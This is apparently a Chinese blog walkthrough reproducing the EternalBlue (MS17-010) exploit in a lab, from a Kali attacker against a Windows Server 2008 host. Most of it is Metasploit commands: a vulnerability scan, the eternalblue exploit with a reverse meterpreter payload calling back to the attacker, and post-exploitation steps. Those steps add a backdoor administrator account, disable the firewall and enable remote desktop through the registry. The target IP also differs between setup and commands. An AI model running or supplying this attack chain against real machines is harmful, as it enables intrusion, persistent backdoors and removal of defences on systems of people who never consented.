天天看點

永恒之藍漏洞複現

影響版本:Windows NT,Windows 2000、Windows XP、Windows 2003、Windows

Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server

2012 SP0。

環境搭建:

  • 攻擊機:kali IP:192.168.120.158
  • 靶機:windows server 2008 IP:192.168.120.120
  • 啟動資料庫:msfdb start 或者 service postgresql start

具體過程:

1.在kali終端中打開msfconsole,查找ms17_010漏洞子產品

search ms17_010
           
永恒之藍漏洞複現

2.先用auxiliary/scanner/smb/smb_ms17_010子產品掃描目标主機是否存在該漏洞

use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 192.168.120.160
           
永恒之藍漏洞複現

3.可以看到掃描結果是目标主機可能存在ms17_010漏洞,開始攻擊

use exploit/windows/smb/ms17_010_eternalblue
set RHOST 192.168.120.160
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.120.158
           
永恒之藍漏洞複現

4.攻擊成功

永恒之藍漏洞複現

5.用shell指令拿到shell控制台權限,進行後門植入

net user hack 123 /add
net localgroup administrators hack /add
net user
net localgroup administrators
           
永恒之藍漏洞複現

6.關閉目标防火牆

netsh advfirewall set allprofiles state off
           
永恒之藍漏洞複現
永恒之藍漏洞複現

7.打開對方的3389端口

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
           
永恒之藍漏洞複現
永恒之藍漏洞複現

8.連接配接遠端桌面

永恒之藍漏洞複現

繼續閱讀